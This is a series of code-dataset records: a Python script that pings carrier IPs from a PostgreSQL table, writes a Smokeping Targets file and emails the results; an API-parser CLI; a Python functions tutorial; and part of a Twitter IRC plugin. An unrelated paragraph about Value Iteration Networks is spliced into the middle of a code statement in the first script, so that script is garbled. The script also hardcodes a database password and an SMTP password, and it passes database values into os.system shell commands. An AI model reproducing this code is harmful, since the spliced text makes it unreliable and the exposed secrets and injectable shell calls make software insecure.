z[1].rstrip(), i[0].rstrip()))\n cursor.execute(\"update ip_test set china_unicom = 'is down' where china_unicom = (%s);\",\n (i[0],))\n\n cursor.execute(\"select china_mobile from ip_test;\")\n ip_list_mobile = cursor.fetchall()\n for i in ip_list_mobile:\n response = os.system('ping -c 8 ' + i[0])\n if response == 0:\n print(i[0], 'is up')\n else:\n print(i[0], 'is down')\n cursor.execute(\"select state, city from ip_test where china_mobile = (%s) and china_mobile != 'is down';\",\n (i[0],))\n china_mobile_down_name = cursor.fetchall()\n for z in china_mobile_down_name:\n mail_down_ip_body.append(('移动', z[0].rstrip() + z[1].rstrip(), i[0].rstrip()))\n cursor.execute(\"update ip_test set china_mobile = 'is down' where china_mobile = (%s);\",\n (i[0],))\n\n cursor.execute(\"select 
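The VIN above is essentially value iteration made differentiable: the reward map plays R, the convolution over [r, v] plays the Bellman backup, and the channel-wise max plays the maximisation over actions. The same recurrence in plain tabular form on a made-up 1-D chain (the states, rewards, and two actions here are illustrative, not the model's actual domain):

import numpy as np

n_states, gamma = 5, 0.9
rewards = np.array([0.0, 0.0, 0.0, 0.0, 1.0])   # reward only at the right end
v = np.zeros(n_states)

for _ in range(200):          # VIN unrolls a fixed number of these sweeps
    left = np.roll(v, 1)      # value after action "left" (move to s-1)
    left[0] = v[0]            # clamp at the left boundary
    right = np.roll(v, -1)    # value after action "right" (move to s+1)
    right[-1] = v[-1]         # clamp at the right boundary
    q = rewards[None, :] + gamma * np.stack([left, right])   # Q(a, s)
    v = q.max(axis=0)                                        # V(s) = max_a Q(a, s)

print(np.round(v, 3))   # values decay geometrically with distance from the goal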
china_telecom from ip_test;\")\n ip_list_telecom = cursor.fetchall()\n for i in ip_list_telecom:\n response = os.system('ping -c 8 ' + i[0])\n if response == 0:\n print(i[0], 'is up')\n else:\n print(i[0], 'is down')\n cursor.execute(\"select state, city from ip_test where china_telecom = (%s) and china_telecom != 'is down';\",\n (i[0],))\n china_telecom_down_name = cursor.fetchall()\n for z in china_telecom_down_name:\n mail_down_ip_body.append(('电信', z[0].rstrip() + z[1].rstrip(), i[0].rstrip()))\n cursor.execute(\"update ip_test set china_telecom = 'is down' where china_telecom = (%s);\",\n (i[0],))\n\n cursor.execute(\"select ip from ip_test_international;\")\n ip_list_int = cursor.fetchall()\n for i in ip_list_int:\n response = os.system('ping -c 8 ' + i[0])\n if response == 0:\n print(i[0], 'is up')\n else:\n print(i[0], 'is down')\n cursor.execute(\"select name from ip_test_international where ip = (%s) and ip != 'is down';\",\n (i[0],))\n ip_int_down_name = cursor.fetchall()\n try:\n mail_down_ip_body.append((ip_int_down_name[0][0], i[0]))\n except IndexError:\n pass\n cursor.execute(\"update ip_test_international set ip = 'is down' where ip = (%s);\",\n (i[0],))\n\n conn.commit()\n cursor.close()\n conn.close()\n\n\n# 从数据库拿到国内和国际的IP测试数据\ndef get_data():\n conn = psycopg2.connect(dbname=\"houm01db\", user=\"postgres\", password=\"packet123\", host=\"10.20.99.105\", port=\"5432\")\n cursor = conn.cursor()\n cursor.execute(\"select state, city, china_telecom, china_unicom, china_mobile, china_edu from ip_test;\")\n ip_test = cursor.fetchall()\n cursor.execute(\"select name, name_en, ip from ip_test_international;\")\n ip_test_int = cursor.fetchall()\n cursor.close()\n conn.close()\n return ip_test, ip_test_int\n\n\ndef output_config():\n china_telcom = []\n china_unicom = []\n china_mobile = []\n int_ip = []\n for i in get_data()[0]:\n if 'is down' != (i[2].rstrip()):\n china_telcom.append(('+++ dianxin-' + ''.join(x[0] for x in lazy_pinyin(i[0].rstrip().rstrip('市'))) + '-' + str(i[2]).replace('.', ''), 'menu = ' + i[0].rstrip().rstrip('市') + i[1].rstrip().rstrip('市') + '电信', 'title = ' + ''.join(lazy_pinyin(i[0].rstrip().rstrip('市'))) + '-' + ''.join(lazy_pinyin(i[1].rstrip().rstrip('市'))) + '-' + i[2].rstrip(), 'host = ' + i[2].rstrip()))\n\n for i in get_data()[0]:\n # print(i[3].rstrip())\n if 'is down' != (i[3].rstrip()):\n china_unicom.append(('+++ liantong-' + ''.join(x[0] for x in lazy_pinyin(i[0].rstrip().rstrip('市'))) + '-' + str(i[3]).replace('.', ''), 'menu = ' + i[0].rstrip().rstrip('市') + i[1].rstrip().rstrip('市') + '联通', 'title = ' + ''.join(lazy_pinyin(i[0].rstrip().rstrip('市'))) + '-' + ''.join(lazy_pinyin(i[1].rstrip().rstrip('市'))) + '-' + i[3].rstrip(), 'host = ' + i[3].rstrip()))\n\n for i in get_data()[0]:\n if 'is down' != (i[4].rstrip()):\n china_mobile.append(('+++ yidong-' + ''.join(x[0] for x in lazy_pinyin(i[0].rstrip().rstrip('市'))) + '-' + str(i[4]).replace('.', ''), 'menu = ' + i[0].rstrip().rstrip('市') + i[1].rstrip().rstrip('市') + '移动', 'title = ' + ''.join(lazy_pinyin(i[0].rstrip().rstrip('市'))) + '-' + ''.join(lazy_pinyin(i[1].rstrip().rstrip('市'))) + '-' + i[4].rstrip(), 'host = ' + i[4].rstrip()))\n\n for i in get_data()[1]:\n if 'is down' != (i[2]):\n int_ip.append(('++ ' + ''.join(i[1]), 'menu = ' + i[0], 'title = ' + i[1] + '-' + i[2], 'host = ' + i[2]))\n\n return china_telcom, china_unicom, china_mobile, int_ip\n\n\n# 将之前所有获取的信息整理成smokeping所需的\"Targets\"配置文件\n# 这里变量设置的比较乱\ndef finally_target():\n with open('ip_target.txt', 'r+') as f:\n 
content = f.read()\n f.seek(0, 0)\n with open('begin_text', 'r') as file:\n f.write(file.read() + '\\n' + content)\n print(f.read())\n with open('ip_target.txt', 'a') as f:\n with open('end_text', 'r') as file:\n f.write(file.read())\n\n with open('ip_target.txt', 'r+') as f:\n aa = f.read()\n pos = aa.find('+++ liantong')\n cc = aa[:pos] + \"\"\"\n++ liantong #联通\nmenu = 联通网络监控 \ntitle = China Unicom \n#host = /Other/liantong/liantong-bj /Other/liantong/liantong-sh /Other/liantong/liantong-gz \n \"\"\" + '\\n' + aa[pos:]\n\n dd = cc.find('+++ yidong')\n ee = cc[:dd] + \"\"\"\n++ yidong #移动\nmenu = 移动网络监控 \ntitle = China mobile\n\"\"\" + '\\n' + cc[dd:]\n\n ff = ee.find('++ Tokyo-Japan')\n gg = ee[:ff] + \"\"\"\n+ Internet\nmenu = 国际线路\ntitle = 国际线路\n \"\"\" + '\\n' + ee[ff:]\n\n with open('Targets', 'w') as finally_txt:\n finally_txt.write(gg)\n\n\ndef mail():\n my_sender = 'houm01@foxmail.com'\n my_user = 'houm01@foxmail.com'\n my_pass = 'vcqvmwgmwgzlbajb'\n\n with open('text.txt', 'w') as f:\n for i in mail_down_ip_body:\n f.write(str(i).replace('(', '').replace(')', '').replace('\\'', '').replace(',', ' -- ') + '\\n')\n\n with open('text.txt', 'r') as f:\n mail_txt_str = f.read()\n\n if len(mail_txt_str) != 0:\n mail_text = '''{} 检测到新增 down ip 如下\\n\\n{}\\n已生成Targets文件,请管理员判断是否处理'''.format(datetime.datetime.now().strftime('%Y-%m-%d %H:%M'), mail_txt_str)\n scan_state = '有新增的down ip,请关注'\n else:\n mail_text = '''{} 经过检测,没有发现有新增down的IP\\n\n {}\n '''.format(datetime.datetime.now().strftime('%Y-%m-%d %H:%M'), mail_txt_str)\n scan_state = '无新增down ip'\n\n ret = True\n try:\n msg = MIMEText(mail_text, 'plain', 'utf-8')\n msg['From'] = formataddr([\"Smokeping 测试\", my_sender]) # 括号里的对应发件人邮箱昵称、发件人邮箱账号\n msg['To'] = formataddr([\"Service\", my_user]) # 括号里的对应收件人邮箱昵称、收件人邮箱账号\n msg['Subject'] = \"Smokeping ��试结果报告 - {} - {}\".format(datetime.datetime.now().strftime('%Y-%m-%d %H:%M'), scan_state) # 邮件的主题,也可以说是标题\n\n server = smtplib.SMTP_SSL(\"smtp.qq.com\", 465) # 发件人邮箱中的SMTP服务器,端口是25\n server.login(my_sender, my_pass) # 括号中对应的是发件人邮箱账号、邮箱密码\n server.sendmail(my_sender, [my_user, ], msg.as_string()) # 括号中对应的是发件人邮箱账号、收件人邮箱账号、发送邮件\n server.quit() # 关闭连接\n except Exception: # 如果 try 中的语句没有执行,则会执行下面的 ret=False\n ret = False\n if ret:\n print(\"邮件发送成功\")\n else:\n print(\"邮件发送失败\")\n\n\nif __name__ == '__main__':\n ping_ip()\n with open('ip_target.txt', 'w') as f:\n for i in output_config():\n for y in i:\n for z in y:\n f.write(z + '\\n')\n finally_target()\n\n mail()\n\n\n\n","sub_path":"python_project/ip_test/ip_test.py","file_name":"ip_test.py","file_ext":"py","file_size_in_byte":10434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"186030262","text":"from dynaconf import settings\nfrom typing import Dict, Union\nfrom datetime import datetime\nimport argparse\n\nfrom api_parser.common.json_parser import HbSmpTable, StlSmpTable\nfrom api_parser.common.db_interaction import write_to_db\nfrom api_parser.common.logger import get_logger\nfrom api_parser.common.api_amr import AmrApiRequester\n\nlogger = get_logger(__name__)\n\n\ndef main():\n # interconects with api\n args: argparse.Namespace = parse_args()\n amr_api = AmrApiRequester()\n amr_api.auth(settings['auth_url'],\n user=settings['api_user'],\n password=settings['api_password'])\n data: list = amr_api.get_data(settings['data_url'],\n args.strt_time, args.end_time,\n args.card_status)\n\n # create tables objects\n hb_smp_table = HbSmpTable(data)\n stl_smp_table = StlSmpTable(data)\n\n # 
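The IP-test script's own comment admits that shelling out to `ping` once per host is slow and suggests wrapping ICMP with threads. A hedged sketch of the threaded variant using only the standard library; the host list is a placeholder, and `-c`/`-W` are the Linux `ping` flags matching the original's usage:

import subprocess
from concurrent.futures import ThreadPoolExecutor

def is_up(ip):
    # Returncode 0 means the host answered one ping within 2 seconds.
    result = subprocess.run(
        ["ping", "-c", "1", "-W", "2", ip],
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )
    return ip, result.returncode == 0

hosts = ["10.20.99.105", "8.8.8.8"]   # placeholder targets
with ThreadPoolExecutor(max_workers=20) as pool:
    for ip, up in pool.map(is_up, hosts):
        print(ip, "is up" if up else "is down")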
Write to DB\n db_settings: Dict[str, Union[str, int]]\n db_settings = {\n 'host': settings['host'], 'port': settings['port'],\n 'database': settings['database'],\n 'user': settings['user'],\n 'password': settings['password'],\n }\n write_hb_smp_table: str = write_to_db(hb_smp_table.as_list(),\n table_name=settings['hb_smp_table'],\n **db_settings)\n\n write_stl_smp_table: str = write_to_db(stl_smp_table.as_list(),\n table_name=settings['stl_smp_table'],\n **db_settings)\n\n\nclass argparse_logger(argparse.ArgumentParser):\n def error(self, message):\n '''\n add logging to argparse\n '''\n logger.error(f'Initial error ocurred : {message}')\n super().error(message)\n\n\ndef parse_args(*args, **kwargs) -> argparse.Namespace:\n '''\n Implement comand line arg parser\n '''\n parser = argparse_logger(description='Parses api for a certain range of time and writes the result in database',\n prog=settings['name'])\n parser.add_argument('-v', '--version', action='version', version=settings['version'])\n parser.add_argument('-s', '--strt_time', type=datetime.fromisoformat,\n help='sampling start time in iso format', required=True, metavar='')\n parser.add_argument('-e', '--end_time', type=datetime.fromisoformat,\n help='sampling end time in iso format', required=True, metavar='')\n parser.add_argument('-c', '--card_status', default='0', choices=['0', '1', '2'], required=False, metavar='',\n help='''\n filtering by ID_CALL_RESULT_STATUS field.\n Choices: 0 - all cards 1 - draft, 2 - filled card.\n Default 0.\n ''')\n return parser.parse_args(*args, **kwargs)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"api_parser/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"319192987","text":"# Programming with Mosh\n# https://www.youtube.com/watch?v=f79MRyMsjrQ\nimport math\n\nprint(\"# Functions\")\n\n# Functions and parameters\n# Perform a task and return None / value\n\n\ndef greet(first_name, last_name=\"the Great\"):\n print(\"Hello World\")\n print(\"Welcome\", first_name)\n return f\"Hi {first_name} {last_name}\"\n\n\nmessage = greet(\"Jess\")\nprint(message)\n# file = open(\"jess.txt\", \"w\")\n# file.write(message)\n\n\ndef increment(number, by=1):\n return number + by\n\n\n# keyword argument\nprint(\"Increment: \", increment(2, by=1))\n\n\ndef multiply(*numbers): # arguments - tuples\n product = 1\n for number in numbers:\n print(number)\n # assignment operator\n product *= number\n return product\n\n\n# Collections of arguments\n# list notation [1,2,3,4]\n# tuples (1,2,3,4)\nprint(\"Multiply: Args: \", multiply(1, 2, 3))\n\n\ndef save_user(**user): # keyword arguments - dictionary\n print(\"Dictionary Name: \", user[\"name\"])\n\n\n# Dictionary Object\nsave_user(id=1, name=\"Jess\", age=35)\n\n# Scope\n# Avoid modify Global variable\ngreeting = \"Hello\"\n\n\ndef hello(name):\n global greet\n greet = f\"Hi {name}\"\n\n\n# Scope\nprint(greet)\nhello(\"Jess\")\nprint(greet)\n\n\n# F5 Run Debug\n# Shift F5 Debug to stop\n# F10 Line by line Execute\n# F11 Step in to a Function\n# Shift F11 Stip out into a Function\n# F9 Set Breakpoin\n\nprint(\"Start\")\nprint(\"Multiply: \", multiply(1, 2, 3))\n\n# VSCode Tricks\n# Alt Arrow to move code up and down\n# Shift Alt Arrow to duplicate\n# Comment Ctrl + /\n\n\nprint(\"Exercise\")\n\n\ndef fizz_buzz(input):\n if(input % 3 == 0 and input % 5 == 0):\n return \"FizzBuzz\"\n if(input % 3 == 0):\n return \"Fizz\"\n if(input % 5 
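Because `parse_args` above forwards `*args` straight through to `argparse`, the CLI contract can be exercised from a test or a REPL without touching `sys.argv`. A small usage sketch with made-up timestamps:

ns = parse_args([
    "--strt_time", "2021-06-01T00:00:00",
    "--end_time", "2021-06-02T00:00:00",
    "--card_status", "2",
])
print(ns.strt_time, ns.end_time, ns.card_status)
# datetime.fromisoformat has already converted both timestamps to datetime objects here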
== 0):\n return \"Buzz\"\n return input\n\n\nprint(fizz_buzz(15))\n","sub_path":"pythonMosh/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"313940004","text":"###\n# Copyright (c) 2014, spline\n# Copyright (c) 2020, oddluck \n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions, and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions, and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the author of this software nor the name of\n# contributors to this software may be used to endorse or promote products\n# derived from this software without specific prior written consent.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n###\n\n# my libs\nimport json\nimport requests\nfrom requests_oauthlib import OAuth1\nimport os\n\n# libraries for time_created_at\nimport time\nfrom datetime import datetime\n\n# for unescape\nimport re\nimport html.entities\n\n# supybot libs\nimport supybot.utils as utils\nfrom supybot.commands import *\nimport supybot.plugins as plugins\nimport supybot.ircutils as ircutils\nimport supybot.callbacks as callbacks\nimport supybot.conf as conf\nimport supybot.world as world\nimport supybot.log as log\n\n\nclass OAuthApi:\n \"\"\"OAuth class to work with Twitter v1.1 API.\"\"\"\n\n def __init__(self, consumer_key, consumer_secret, token, token_secret):\n self.auth = OAuth1(consumer_key, consumer_secret, token, token_secret)\n\n def ApiCall(self, call, parameters={}):\n \"\"\"Calls the twitter API with 'call' and returns the twitter object (JSON).\"\"\"\n extra_params = {}\n if parameters:\n extra_params.update(parameters)\n try:\n r = requests.get(\n \"https://api.twitter.com/1.1/\" + call + \".json\",\n params=extra_params,\n auth=self.auth,\n timeout=10,\n )\n r.raise_for_status()\n except (\n requests.exceptions.RequestException,\n requests.exceptions.HTTPError,\n ) as e:\n log.info(\n \"Tweety: error connecting to Twitter API (Retrying...): {0}\".format(e)\n )\n try:\n r = requests.get(\n \"https://api.twitter.com/1.1/\" + call + \".json\",\n params=extra_params,\n auth=self.auth,\n timeout=10,\n )\n r.raise_for_status()\n except (\n requests.exceptions.RequestException,\n requests.exceptions.HTTPError,\n ) as e:\n log.info(\n \"Tweety: error connecting to Twitter API on retry: {0}\".format(e)\n )\n else:\n return 
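The `OAuthApi` wrapper being built here does all of its authentication by attaching a `requests_oauthlib.OAuth1` signer to each request. The same flow in isolation, with the four credential strings as obvious placeholders for your own Twitter app's keys:

import requests
from requests_oauthlib import OAuth1

auth = OAuth1(
    "CONSUMER_KEY", "CONSUMER_SECRET",        # app credentials (placeholders)
    "ACCESS_TOKEN", "ACCESS_TOKEN_SECRET",    # user credentials (placeholders)
)
r = requests.get(
    "https://api.twitter.com/1.1/account/verify_credentials.json",
    auth=auth,
    timeout=10,
)
print(r.status_code)   # 200 means all four keys are valid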
r.content\n else:\n return r.content\n\n\nclass Tweety(callbacks.Plugin):\n \"\"\"Public Twitter class for working with the API.\"\"\"\n\n threaded = True\n\n def __init__(self, irc):\n self.__parent = super(Tweety, self)\n self.__parent.__init__(irc)\n self.twitterApi = False\n if not self.twitterApi:\n self._checkAuthorization()\n self.data_file = conf.supybot.directories.data.dirize(\"tweety.json\")\n if os.path.exists(self.data_file):\n with open(self.data_file) as f:\n self.since_id = json.load(f)\n else:\n log.debug(\"Tweety: Creating new since_id DB\")\n self.since_id = {}\n world.flushers.append(self._flush_db)\n\n def _flush_db(self):\n with open(self.data_file, \"w\") as f:\n json.dump(self.since_id, f)\n\n def die(self):\n world.flushers.remove(self._flush_db)\n self._flush_db()\n super().die()\n\n def _shortenUrl(self, url):\n \"\"\"Shortens a long URL into a short one.\"\"\"\n try:\n data = requests.get(\n \"http://tinyurl.com/api-create.php?url={0}\".format(url), timeout=5\n )\n except (\n requests.exceptions.RequestException,\n requests.exceptions.HTTPError,\n ) as e:\n log.error(\"Tweety: ERROR retrieving tiny url: {0}\".format(e))\n return\n else:\n return data.content.decode()\n\n def _checkAuthorization(self):\n \"\"\" Check if we have our keys and can auth.\"\"\"\n if not self.twitterApi: # if not set, try and auth.\n failTest = False # first check that we have all 4 keys.\n for checkKey in (\n \"consumerKey\",\n \"consumerSecret\",\n \"accessKey\",\n \"accessSecret\",\n ):\n try: # try to see if each key is set.\n testKey = self.registryValue(checkKey)\n except: # a key is not set, break and error.\n log.error(\n \"Tweety: ERROR checking keys. We're missing the config value \"\n \"for: {0}. Please set this and try again.\".format(checkKey)\n )\n failTest = True\n break\n # if any missing, throw an error and keep twitterApi=False\n if failTest:\n log.error(\n \"Tweety: ERROR getting keys. You must set all 4 keys in config \"\n \"variables and reload plugin.\"\n )\n return False\n # We have all 4 keys. Check validity by calling verify_credentials in the API.\n self.log.info(\"Got all 4 keys. Now trying to auth up with Twitter.\")\n twitterApi = OAuthApi(\n self.registryValue(\"consumerKey\"),\n self.registryValue(\"consumerSecret\"),\n self.registryValue(\"accessKey\"),\n self.registryValue(\"accessSecret\"),\n )\n data = twitterApi.ApiCall(\"account/verify_credentials\")\n # check the response. if we can load json, it means we're authenticated.\n try: # if we pass, response is validated. set self.twitterApi w/object.\n json.loads(data)\n self.log.info(\n \"I have successfully authorized and logged in to Twitter using \"\n \"your credentials.\"\n )\n self.twitterApi = OAuthApi(\n self.registryValue(\"consumerKey\"),\n self.registryValue(\"consumerSecret\"),\n self.registryValue(\"accessKey\"),\n self.registryValue(\"accessSecret\"),\n )\n except: # response failed. Return what we got back.\n log.error(\"Tweety: ERROR. 
I could not log in using your credentials.\")\n return False\n else: # if we're already validated, pass.\n pass\n\n ########################\n # COLOR AND FORMATTING #\n ########################\n\n def _red(self, string):\n \"\"\"Returns a red string.\"\"\"\n return ircutils.mircColor(string, \"red\")\n\n def _blue(self, string):\n \"\"\"Returns a blue string.\"\"\"\n return ircutils.mircColor(string, \"blue\")\n\n def _bold(self, string):\n \"\"\"Returns a bold string.\"\"\"\n return ircutils.bold(string)\n\n def _ul(self, string):\n \"\"\"Returns an underline string.\"\"\"\n return ircutils.underline(string)\n\n def _bu(self, string):\n \"\"\"Returns a bold/underline string.\"\"\"\n return ircutils.bold(ircutils.underline(string))\n\n ######################\n # INTERNAL FUNCTIONS #\n ######################\n\n def _unescape(self, text):\n \"\"\"Created by Fredrik Lundh (http://effbot.org/zone/re-sub.htm#unescape-html)\"\"\"\n # quick dump \\n and \\r, usually coming from bots that autopost html.\n text = text.replace(\"\\n\", \" \").replace(\"\\r\", \" \")\n # now the actual unescape.\n def fixup(m):\n text = m.group(0)\n if text[:2] == \"&#\":\n # character reference\n try:\n if text[:3] == \"&#x\":\n return chr(int(text[3:-1], 16))\n else:\n return chr(int(text[2:-1]))\n except (ValueError, OverflowError):\n pass\n else:\n # named entity\n try:\n text = chr(html.entities.name2codepoint[text[1:-1]])\n except KeyError:\n pass\n return text # leave as is\n\n return re.sub(r\"&#?\\w+;\", fixup, text)\n\n def _time_created_at(self, s):\n \"\"\"\n Return relative time delta between now and s (dt string).\n \"\"\"\n try: # timeline's created_at Tue May 08 10:58:49 +0000 2012\n ddate = time.strptime(s, \"%a %b %d %H:%M:%S +0000 %Y\")[:-2]\n except ValueError:\n try: # search's created_at Thu, 06 Oct 2011 19:41:12 +0000\n ddate = time.strptime(s, \"%a, %d %b %Y %H:%M:%S +0000\")[:-2]\n except ValueError:\n return s\n # do the math\n d = datetime.utcnow() - datetime(*ddate, tzinfo=None)\n # now parse and return.\n if d.days:\n rel_time = \"{:1d}d ago\".format(abs(d.days))\n elif d.seconds > 3600:\n rel_time = \"{:.1f}h ago\".format(round((abs(d.seconds) / 3600), 1))\n elif 60 <= d.seconds < 3600:\n rel_time = \"{:.1f}m ago\".format(round((abs(d.seconds) / 60), 1))\n else:\n rel_time = \"%ss ago\" % (abs(d.seconds))\n return rel_time\n\n def _outputTweet(\n self, irc, msg, nick, name, verified, text, time, tweetid, retweetid\n ):\n \"\"\"\n Constructs string to output for Tweet. 
Used for tsearch and twitter.\n \"\"\"\n url = url2 = None\n # build output string.\n if self.registryValue(\"outputColorTweets\", msg.args[0]):\n ret = \"@{0}\".format(self._ul(self._blue(nick)))\n else: # bold otherwise.\n ret = \"@{0}\".format(self._bu(nick))\n if verified:\n string = self._bold(ircutils.mircColor(\"✓\", \"white\", \"blue\"))\n ret += \"{}\".format(string)\n # show real name in tweet output?\n if not self.registryValue(\"hideRealName\", msg.args[0]):\n ret += \" ({0})\".format(name)\n # short url the link to the tweet?\n if self.registryValue(\"addShortUrl\", msg.args[0]):\n url = self._shortenUrl(\n \"https://twitter.com/{0}/status/{1}\".format(nick, tweetid)\n )\n if url:\n text += \" {0}\".format(url)\n if retweetid and retweetid != tweetid:\n url2 = self._shortenUrl(\n \"https://twitter.com/{0}/status/{1}\".format(nick, retweetid)\n )\n if url2:\n text += \" {0}\".format(url2)\n # add in the end with the text + tape.\n if self.registryValue(\"colorTweetURLs\", msg.args[0]): # color urls.\n text = re.sub(\n r\"(http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F]\"\n r\"[0-9a-fA-F]))+)\",\n self._red(r\"\\1\"),\n text,\n )\n ret += \": {0} ({1})\".format(text, self._bold(time))\n else: # only bold time. no text color.\n ret += \": {0} ({1})\".format(text, self._bold(time))\n # now return.\n return ret\n\n def _woeid_lookup(self, lookup):\n \"\"\"\n Use Yahoo's API to look-up a WOEID.\n \"\"\"\n data = self.twitterApi.ApiCall(\"trends/available\")\n if not data:\n log.error(\"Tweety: ERROR retrieving data from Trends API\")\n return\n try:\n data = json.loads(data)\n except:\n data = None\n log.error(\"Tweety: ERROR retrieving data from Trends API\")\n if not data:\n log.info(\"Tweety: No location results for {0}\".format(lookup))\n return\n return next(\n (item[\"woeid\"] for item in data if lookup.lower() in item[\"name\"].lower()),\n None,\n )\n\n ####################\n # PUBLIC FUNCTIONS #\n ####################\n\n def woeidlookup(self, irc, msg, args, lookup):\n \"\"\"\n Search Yahoo's WOEID DB for a location. Useful for the trends variable.\n Ex: London or Boston\n \"\"\"\n woeid = self._woeid_lookup(lookup)\n if woeid:\n irc.reply(\"WOEID: {0} for '{1}'\".format(self._bold(woeid), lookup))\n else:\n irc.reply(\n \"ERROR: Something broke trying to find a WOEID for '{0}'\".format(lookup)\n )\n\n woeidlookup = wrap(woeidlookup, [\"text\"])\n\n def ratelimits(self, irc, msg, args):\n \"\"\"\n Display current rate limits for your twitter API account.\n \"\"\"\n # before we do anything, make sure we have a twitterApi object.\n if not self.twitterApi:\n irc.reply(\n \"ERROR: Twitter is not authorized. Please check logs before running \"\n \"this command.\"\n )\n return\n # make API call.\n data = self.twitterApi.ApiCall(\n \"application/rate_limit_status\",\n parameters={\"resources\": \"trends,search,statuses,users\"},\n )\n try:\n data = json.loads(data)\n except:\n irc.reply(\"ERROR: Failed to lookup ratelimit data: {0}\".format(data))\n return\n # parse data;\n data = data.get(\"resources\")\n if not data: # simple check if we have part of the json dict.\n irc.reply(\n \"ERROR: Failed to fetch application rate limit status. Something could \"\n \"be wrong with Twitter.\"\n )\n log.error(\"Tweety: ERROR fetching rate limit data: {0}\".format(data))\n return\n # dict of resources and how to parse. 
key=name, values are for the json dict.\n resources = {\n \"trends\": [\"trends\", \"/trends/place\"],\n \"tsearch\": [\"search\", \"/search/tweets\"],\n \"twitter --id\": [\"statuses\", \"/statuses/show/:id\"],\n \"twitter --info\": [\"users\", \"/users/show/:id\"],\n \"twitter timeline\": [\"statuses\", \"/statuses/user_timeline\"],\n }\n # now iterate through dict above.\n for resource in resources:\n rdict = resources[resource] # get value.\n endpoint = data.get(rdict[0]).get(rdict[1]) # value[0], value[1]\n minutes = \"%sm%ss\" % divmod(\n int(endpoint[\"reset\"]) - int(time.time()), 60\n ) # math.\n output = \"Reset in: {0} Remaining: {1}\".format(\n minutes, endpoint[\"remaining\"]\n )\n irc.reply(\"{0} :: {1}\".format(self._bold(resource), output))\n\n ratelimits = wrap(ratelimits)\n\n def trends(self, irc, msg, args, getopts, optwoeid):\n \"\"\"[--exclude] [location]\n Returns the top Twitter trends for a specific location. Use optional argument\n location for trends. Defaults to worldwide and can be set via config variable.\n Use --exclude to not include #hashtags in trends data.\n Ex: Boston or --exclude London\n \"\"\"\n # enforce +voice or above to use command?\n if self.registryValue(\"requireVoiceOrAbove\", msg.args[0]): # should we check?\n if ircutils.isChannel(msg.args[0]): # are we in a channel?\n if not irc.state.channels[msg.args[0]].isVoicePlus(\n msg.nick\n ): # are they + or @?\n irc.error(\n \"ERROR: You have to be at least voiced to use the trends \"\n \"command in {0}.\".format(msg.args[0])\n )\n return\n # before we do anything, make sure we have a twitterApi object.\n if not self.twitterApi:\n irc.reply(\n \"ERROR: Twitter is not authorized. Please check logs before running \"\n \"this command.\"\n )\n return\n # default arguments.\n args = {\n \"id\": self.registryValue(\"woeid\", msg.args[0]),\n \"exclude\": self.registryValue(\"hideHashtagsTrends\", msg.args[0]),\n }\n # handle input.\n if getopts:\n for (key, value) in getopts:\n if key == \"exclude\": # remove hashtags from trends.\n args[\"exclude\"] = \"hashtags\"\n # work with woeid. 1 is world, the default. can be set via input or via config.\n if optwoeid: # if we have an input location, lookup the woeid.\n if optwoeid.lower().startswith(\n \"world\"\n ): # looking for worldwide or some variation. (bypass)\n args[\"id\"] = 1 # \"World Wide\" is worldwide (odd bug) = 1.\n elif optwoeid.strip().isdigit():\n args[\"id\"] = optwoeid.strip()\n else: # looking for something else.\n woeid = self._woeid_lookup(optwoeid) # yahoo search for woeid.\n if (\n woeid\n ): # if we get a returned value, set it. otherwise default value.\n args[\"id\"] = woeid\n else: # location not found.\n irc.reply(\n \"ERROR: I could not lookup location: {0}. Try a different \"\n \"location.\".format(optwoeid)\n )\n return\n # now build our API call\n data = self.twitterApi.ApiCall(\"trends/place\", parameters=args)\n try:\n data = json.loads(data)\n except:\n irc.reply(\"ERROR: failed to lookup trends on Twitter: {0}\".format(data))\n return\n # now, before processing, check for errors:\n if \"errors\" in data:\n if data[\"errors\"][0][\"code\"] == 34: # 34 means location not found.\n irc.reply(\"ERROR: I do not have any trends for: {0}\".format(optwoeid))\n return\n else: # just return the message.\n errmsg = data[\"errors\"][0]\n irc.reply(\n \"ERROR: Could not load trends. ({0} {1})\".format(\n errmsg[\"code\"], errmsg[\"message\"]\n )\n )\n return\n # if no error here, we found trends. 
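The reply below comes out roughly as\n # 'Top Twitter Trends in Worldwide :: #One | #Two' (illustrative names). Now we 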
